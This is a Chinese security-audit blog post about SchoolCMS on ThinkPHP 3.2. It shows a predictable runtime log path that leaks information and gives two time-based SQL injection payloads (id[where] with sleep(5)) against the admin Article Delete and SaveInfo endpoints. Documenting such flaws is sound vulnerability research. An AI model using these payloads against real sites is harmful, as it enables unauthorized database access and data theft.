最近一直在研究thinkphp的框架,今天找了一个cms进行审计,发现了两处注入点,由此来进行分析一下。https://gitee.com/zuirenxx/schoolcms按照官网要求进行安装,安装完成,我们先了解⼀下网站目录架构:
0×1:代码审计基于ThinkPHP3.2开发的index.php没什么好看的访问模式
?m=model&c=controller&a=function /Home/Channel/Index,先看⼀下TP3.2.x存在的各种问题。
0×2:日志泄露ThinkPHP3.2结构:
ApplicationRuntimeLogsHome18_07_27.log
ThinkPHP3.2解析:
项目名RuntimeLogsHome年份_月份_日期.log
直接访问:
http://www.school.com/Application/Runtime/Logs/Home/22_02_16.log成功回显。
位于
/index.php?m=Admin&c=Article&a=Delete
id[where]=id=1+or+sleep(5) 成功延时。
第二处注入/index.php?m=Admin&c=Article&a=SaveInfo
poc /index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3%20and%20sleep(5)--+1
可以看到延时注入成功。
最新评论